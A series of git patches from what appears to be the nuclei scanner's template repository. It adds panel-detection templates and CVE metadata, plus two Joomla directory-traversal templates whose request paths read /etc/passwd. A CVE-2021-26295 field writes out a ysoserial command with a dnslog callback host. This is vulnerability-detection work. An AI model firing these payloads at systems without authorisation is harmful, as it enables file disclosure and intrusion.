+- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 95e3f9a597..89bd02fd49 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -23,7 +23,7 @@ jobs: env: GO111MODULE: on run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@master shell: bash - name: Template Validation From ec4a1cf38dd42e67262f3557caccf74b5eba2004 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 22:54:45 +0530 Subject: [PATCH 2129/4083] testing automation --- cves/2011/CVE-2011-2780.yaml | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml index db72d7955c..d57a2e90e1 100644 --- a/cves/2011/CVE-2011-2780.yaml +++ b/cves/2011/CVE-2011-2780.yaml @@ -4,15 +4,7 @@ info: name: Chyrp 2.x - Local File Inclusion (LFI) author: daffainfo severity: high - description: Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/35946 - - https://www.cvedetails.com/cve/CVE-2011-2780 - tags: cve,cve2011,lfi - classification: - cvss-score: 5.0 - cve-id: CVE-2011-2780 - cwe-id: CWE-22 + tags: cve,cve2011,lfi,chyrp requests: - method: GET From 76c7234ca042afec00b592c59c6890be8b03501f Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 23:11:34 +0530 Subject: [PATCH 2130/4083] Update cve-annotate.yml --- .github/workflows/cve-annotate.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 754b772885..9a81739780 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -43,3 +43,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} + branch: ${{ github.ref }} From ca9d4a136e5250999c790a14736d7d130a23282b Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 23:30:36 +0530 Subject: [PATCH 2131/4083] dev update --- .github/workflows/cve-annotate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 9a81739780..8e0fd3c94d 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -25,7 +25,7 @@ jobs: run: | if ! which cve-annotate > /dev/null; then echo -e "Command cve-annotate not found! Installing\c" - go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@master + go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev fi cve-annotate -i ./cves/ -d . echo "::set-output name=changes::$(git status -s | wc -l)" From c41f64987b28967b298fe9d985f3b50f5f1f4a83 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Fri, 10 Sep 2021 17:18:15 -0300 Subject: [PATCH 2132/4083] Update wordpress-db-repair.yaml Solves this false positive (different encoding) nuclei -debug -t nuclei-templates/vulnerabilities/wordpress/wordpress-db-repair.yaml -u https://try.walmart.com <p><code>define('WP_ALLOW_REPAIR', true); --- vulnerabilities/wordpress/wordpress-db-repair.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-db-repair.yaml b/vulnerabilities/wordpress/wordpress-db-repair.yaml index c3c2709096..6cf8668d0b 100644 --- a/vulnerabilities/wordpress/wordpress-db-repair.yaml +++ b/vulnerabilities/wordpress/wordpress-db-repair.yaml @@ -24,5 +24,8 @@ requests: - type: word words: - - "define('WP_ALLOW_REPAIR', true);" - negative: true \ No newline at end of file + - "define" + - "WP_ALLOW_REPAIR" + - "true" + condition: and + negative: true From 80702f0451172e42bc54e06b1a09ddcf08e852ea Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Sat, 11 Sep 2021 02:24:37 -0300 Subject: [PATCH 2133/4083] Create carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 27 +++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 technologies/carestream-vue-detect.yaml diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml new file mode 100644 index 0000000000..db87a0e67e --- /dev/null +++ b/technologies/carestream-vue-detect.yaml @@ -0,0 +1,27 @@ +id: carestream-vue-detect + +info: + name: CARESTREAM Vue Motion Detector + author: philippedelteil + severity: info + description: This template will detect a running CARESTREAM Vue Motion instance + references: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf + +requests: + - method: GET + path: + - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" + - "{{BaseURL}}/portal/favicon.ico" + redirects: true + stop-at-first-match: true + max-redirects: 2 + matchers: + - type: dsl + name: "MyVueHelp" + dsl: + - "status_code==200 && (\"84054196570ecd7526894ccb6e7c5c6e\" == md5(body))" + + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" From 5582e890a14ad1f392448b43ec7b890c30ca1cbb Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:16:55 +0530 Subject: [PATCH 2134/4083] pre-commit-config update --- .github/workflows/template-validate.yml | 4 ++-- .pre-commit-config.yaml => .pre-commit-config.yml | 0 .yamllint | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) rename .pre-commit-config.yaml => .pre-commit-config.yml (100%) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 89bd02fd49..e1e189c35b 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -28,6 +28,6 @@ jobs: - name: Template Validation run: | - nuclei -validate -t . -exclude .pre-commit-config.yaml - nuclei -validate -w ./workflows -exclude .pre-commit-config.yaml + nuclei -validate -t . + nuclei -validate -w ./workflows shell: bash \ No newline at end of file diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yml similarity index 100% rename from .pre-commit-config.yaml rename to .pre-commit-config.yml diff --git a/.yamllint b/.yamllint index 681c2959c0..ddcf63b7b7 100644 --- a/.yamllint +++ b/.yamllint @@ -2,7 +2,7 @@ extends: default ignore: | - .pre-commit-config.yaml + .pre-commit-config.yml .github/workflows/*.yml rules: From c2e651272cb35a8e651ed60b692ac98097279e76 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:22:12 +0530 Subject: [PATCH 2135/4083] Update carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml index db87a0e67e..989eceab43 100644 --- a/technologies/carestream-vue-detect.yaml +++ b/technologies/carestream-vue-detect.yaml @@ -1,27 +1,30 @@ id: carestream-vue-detect info: - name: CARESTREAM Vue Motion Detector + name: CARESTREAM Vue Motion Detector author: philippedelteil severity: info description: This template will detect a running CARESTREAM Vue Motion instance references: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf + tags: tech,myvuehelp requests: - method: GET path: - - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" - "{{BaseURL}}/portal/favicon.ico" + - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" + redirects: true stop-at-first-match: true max-redirects: 2 + matchers-condition: or matchers: - type: dsl - name: "MyVueHelp" + name: "myvuehelp" dsl: - - "status_code==200 && (\"84054196570ecd7526894ccb6e7c5c6e\" == md5(body))" + - 'status_code==200 && ("84054196570ecd7526894ccb6e7c5c6e" == md5(body))' - type: dsl - name: "favicon" + name: "myvuehelp-favicon" dsl: - - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" + - 'status_code==200 && (1c4b2c10acccc48852d12eddadaf7944" == md5(body))' \ No newline at end of file From 217840fe993f61e5bacefe89357fa26bde05061c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:27:48 +0530 Subject: [PATCH 2136/4083] Update carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml index 989eceab43..5a7c50f69d 100644 --- a/technologies/carestream-vue-detect.yaml +++ b/technologies/carestream-vue-detect.yaml @@ -5,7 +5,7 @@ info: author: philippedelteil severity: info description: This template will detect a running CARESTREAM Vue Motion instance - references: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf + reference: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf tags: tech,myvuehelp requests: From 9aa0acb8d2e2c74971216c935ac76f7b28bd7966 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:34:40 +0530 Subject: [PATCH 2137/4083] Update carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml index 5a7c50f69d..b7ce069ac1 100644 --- a/technologies/carestream-vue-detect.yaml +++ b/technologies/carestream-vue-detect.yaml @@ -22,9 +22,9 @@ requests: - type: dsl name: "myvuehelp" dsl: - - 'status_code==200 && ("84054196570ecd7526894ccb6e7c5c6e" == md5(body))' + - "status_code==200 && (\"84054196570ecd7526894ccb6e7c5c6e\" == md5(body))" - type: dsl name: "myvuehelp-favicon" dsl: - - 'status_code==200 && (1c4b2c10acccc48852d12eddadaf7944" == md5(body))' \ No newline at end of file + - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" \ No newline at end of file From a6d61cd622c3c280b46b46418d9c5edb124be33a Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 13:53:26 +0530 Subject: [PATCH 2138/4083] workflow update --- .github/workflows/cve-annotate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 754b772885..ecad02f49f 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -1,7 +1,7 @@ name: ✍🏻 CVE Annotate on: - pull_request: + push: branches: - master workflow_dispatch: From 6bd323aae1d3d23932be739745f751e6921f248c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 11 Sep 2021 08:45:52 +0000 Subject: [PATCH 2139/4083] Auto Generated CVE annotations [Sat Sep 11 08:45:52 UTC 2021] :robot: --- cves/2011/CVE-2011-2780.yaml | 12 ++++++++++++ cves/2015/CVE-2015-7450.yaml | 5 +++++ 2 files changed, 17 insertions(+) diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml index d57a2e90e1..1cb0a0ac54 100644 --- a/cves/2011/CVE-2011-2780.yaml +++ b/cves/2011/CVE-2011-2780.yaml @@ -5,6 +5,18 @@ info: author: daffainfo severity: high tags: cve,cve2011,lfi,chyrp + description: "Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744." + reference: + - http://www.justanotherhacker.com/advisories/JAHx113.txt + - http://www.openwall.com/lists/oss-security/2011/07/13/5 + - http://www.ocert.org/advisories/ocert-2011-001.html + - http://www.openwall.com/lists/oss-security/2011/07/13/6 + - http://www.securityfocus.com/bid/48672 + - http://secunia.com/advisories/45184 + - http://osvdb.org/73891 + - http://securityreason.com/securityalert/8312 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 + - http://www.securityfocus.com/archive/1/518890/100/0/threaded requests: - method: GET diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index e27a3e815f..04918de4f0 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -10,6 +10,11 @@ info: - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 tags: cve,cve2015,websphere,deserialization,rce,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2015-7450 + cwe-id: CWE-94 requests: - raw: From 207c140c504264803a0a4d2fd8776bc289e25508 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 21:06:36 +0530 Subject: [PATCH 2140/4083] moving files around --- .../other/karel-ip-phone-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename karel-ip-phone-lfi.yaml => vulnerabilities/other/karel-ip-phone-lfi.yaml (100%) diff --git a/karel-ip-phone-lfi.yaml b/vulnerabilities/other/karel-ip-phone-lfi.yaml similarity index 100% rename from karel-ip-phone-lfi.yaml rename to vulnerabilities/other/karel-ip-phone-lfi.yaml From 50e9ff0839d5f6d5401074c1d05f29915ccdad67 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sat, 11 Sep 2021 21:12:06 +0530 Subject: [PATCH 2141/4083] Create oracle-business-control.yaml --- exposed-panels/oracle-business-control.yaml | 24 +++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/oracle-business-control.yaml diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml new file mode 100644 index 0000000000..04d90cc407 --- /dev/null +++ b/exposed-panels/oracle-business-control.yaml @@ -0,0 +1,24 @@ +id: oracle-business-control + +info: + name: Oracle Commerce Business Control Center + author: dhiyaneshDk + severity: info + tags: oracle,login + reference: + - https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 + +requests: + - method: GET + path: + - '{{BaseURL}}/atg/bcc' + + matchers-condition: and + matchers: + - type: word + words: + - '<title>Oracle Commerce Business Control Center' + + - type: status + status: + - 200 From eec52d721480f8be50037d7160185e58a4a10d11 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 11 Sep 2021 21:20:57 +0530 Subject: [PATCH 2142/4083] Create oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/oracle-integrated-manager.yaml diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml new file mode 100644 index 0000000000..8a61b0ea64 --- /dev/null +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -0,0 +1,24 @@ +id: oracle-integrated-manager + +info: + name: Oracle(R) Integrated Lights Out Manager + author: dhiyaneshDk + severity: info + tags: oracle,login + reference: + - https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 + +requests: + - method: GET + path: + - '{{BaseURL}}/iPages/i_login.asp' + + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle(R) Integrated Lights Out Manager - Login' + + - type: status + status: + - 200 From 1f40ec24c5bc6ff1e61494fdb1d9891f15e30e8d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 11 Sep 2021 21:50:06 +0530 Subject: [PATCH 2143/4083] Create oracle-people-enterprise.yaml --- exposed-panels/oracle-people-enterprise.yaml | 26 ++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/oracle-people-enterprise.yaml diff --git a/exposed-panels/oracle-people-enterprise.yaml b/exposed-panels/oracle-people-enterprise.yaml new file mode 100644 index 0000000000..eba64c8a2a --- /dev/null +++ b/exposed-panels/oracle-people-enterprise.yaml @@ -0,0 +1,26 @@ +id: oracle-people-enterprise + +info: + name: Oracle Peoplesoft Enterprise + author: dhiyaneshDk + severity: info + tags: oracle,login + reference: + - https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "/signon.html" + - " Date: Sun, 12 Sep 2021 05:10:08 +0700 Subject: [PATCH 2145/4083] Create CVE-2010-2037.yaml --- cves/2010/CVE-2010-2037.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2037.yaml diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml new file mode 100644 index 0000000000..9a9b24c3e6 --- /dev/null +++ b/cves/2010/CVE-2010-2037.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2037 + +info: + name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34005 + - https://www.cvedetails.com/cve/CVE-2010-2037 + tags: cve,cve2010,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 81ea9540f2e645250a5e4ee9e31e395391eeb326 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 12 Sep 2021 06:18:29 +0700 Subject: [PATCH 2146/4083] Create CVE-2010-1723.yaml --- cves/2010/CVE-2010-1723.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1723.yaml diff --git a/cves/2010/CVE-2010-1723.yaml b/cves/2010/CVE-2010-1723.yaml new file mode 100644 index 0000000000..4b5060444b --- /dev/null +++ b/cves/2010/CVE-2010-1723.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1723 + +info: + name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12289 + - https://www.cvedetails.com/cve/CVE-2010-1723 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From f0a500cf976af1720f0d79d071ad12a325a9919d Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 11 Sep 2021 22:14:16 -0300 Subject: [PATCH 2147/4083] Create symantec-ewep.yaml --- exposed-panels/symantec-ewep.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/symantec-ewep.yaml diff --git a/exposed-panels/symantec-ewep.yaml b/exposed-panels/symantec-ewep.yaml new file mode 100644 index 0000000000..6891d66808 --- /dev/null +++ b/exposed-panels/symantec-ewep.yaml @@ -0,0 +1,22 @@ +id: symantec-ewep + +info: + name: Detect Symantec Encryption Web Email Protection + author: johnk3r + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/b/l.e" + + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Corporation. All Rights Reserved" + part: body + - type: status + status: + - 200 From 896343be128678e07d0c2166d7444d906a0f4f55 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:41:33 +0300 Subject: [PATCH 2148/4083] Clarify description --- vulnerabilities/oscommerce/oscommerce-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml index 5f888337fc..f359c42b11 100644 --- a/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -3,7 +3,7 @@ id: oscommerce-rce info: author: Suman_Kar name: osCommerce 2.3.4.1 - Remote Code Execution - description: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php + description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to injecting PHP code into the db_database parameter, and subsequently use the configure.php page to to read the command's executed output reference: https://www.exploit-db.com/exploits/50128 severity: high tags: rce,oscommerce From 624162cca79ad4aa06f205869262c44e9633c30a Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:50:53 +0300 Subject: [PATCH 2149/4083] Working reference --- vulnerabilities/wordpress/wp-custom-tables-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index c0918d72c5..958241da6b 100644 --- a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability - reference: https://www.securityfocus.com/bid/54326/info + reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 tags: wordpress,xss,wp-plugin requests: From fb2f89bc867e272a0eb77331ef73c891ae1969d0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:58:43 +0300 Subject: [PATCH 2150/4083] References --- vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index 7075c485bf..dfb6f028d4 100644 --- a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -5,6 +5,9 @@ info: author: madrobot severity: high tags: wordpress,rce,ssrf + reference: + - https://www.exploit-db.com/exploits/49327 + - https://wpscan.com/vulnerability/10417 requests: - raw: From e602575ae0cc3fd849742cdf401f709050d3e616 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:58:48 +0300 Subject: [PATCH 2151/4083] Working reference --- vulnerabilities/wordpress/wp-church-admin-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-church-admin-xss.yaml b/vulnerabilities/wordpress/wp-church-admin-xss.yaml index f5c5957b97..089b607075 100644 --- a/vulnerabilities/wordpress/wp-church-admin-xss.yaml +++ b/vulnerabilities/wordpress/wp-church-admin-xss.yaml @@ -4,7 +4,7 @@ info: name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/54329/info + reference: https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin requests: From 59525a5846f37fd5eca99aff887d5db16abd564a Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 13:02:41 +0300 Subject: [PATCH 2152/4083] Working reference --- vulnerabilities/wordpress/wp-finder-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-finder-xss.yaml b/vulnerabilities/wordpress/wp-finder-xss.yaml index 1bbd46235e..d9dd3851bf 100644 --- a/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -4,7 +4,7 @@ info: name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/55217/info + reference: https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin requests: From 46b16bcfa2960e2d80e4bd22c2c00a4e6d324017 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 14:16:01 +0300 Subject: [PATCH 2153/4083] Incomplete title --- vulnerabilities/wordpress/wp-super-forms.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-super-forms.yaml b/vulnerabilities/wordpress/wp-super-forms.yaml index 7b1c01e7ad..1d3a407ad9 100644 --- a/vulnerabilities/wordpress/wp-super-forms.yaml +++ b/vulnerabilities/wordpress/wp-super-forms.yaml @@ -1,6 +1,6 @@ id: wordpress-super-forms info: - name: WordPress super-forms + name: WordPress super-forms Plugin Directory Listing author: pussycat0x severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. From 34bba4e794f0251dc84cf0670e6c7e585c27ea81 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 17:10:52 +0530 Subject: [PATCH 2154/4083] misc update --- cves/2019/CVE-2019-14470.yaml | 1 - cves/2021/CVE-2021-26295.yaml | 6 ++---- vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml | 2 +- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 82fc91e2cf..d956d7190a 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -4,7 +4,6 @@ info: name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter. reference: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index ab08b76304..42481137f2 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -9,15 +9,13 @@ info: - https://github.com/yumusb/CVE-2021-26295-POC - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E - -# Note:- This is detection template, To perform deserializes do as below -# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot -# `cat mad.ot | hex` and replace in along with the url in std-String value classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-26295 cwe-id: CWE-502 + additional-fileds: + ysoserial-payload: 'java -jar ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn | hex' requests: - raw: diff --git a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index dfb6f028d4..4fe1fb2f7a 100644 --- a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: high tags: wordpress,rce,ssrf - reference: + reference: - https://www.exploit-db.com/exploits/49327 - https://wpscan.com/vulnerability/10417 From 162928ed27111f31c14fc011c730e4f503a238c0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 17:16:47 +0530 Subject: [PATCH 2155/4083] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 42481137f2..fa1a549e53 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.80 cve-id: CVE-2021-26295 cwe-id: CWE-502 - additional-fileds: + additional-fields: ysoserial-payload: 'java -jar ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn | hex' requests: From 3eb7e213a7d6a7fdef5bcf2cbbb016c6706ba6c6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 17:22:25 +0530 Subject: [PATCH 2156/4083] Update symantec-ewep.yaml --- exposed-panels/symantec-ewep.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/symantec-ewep.yaml 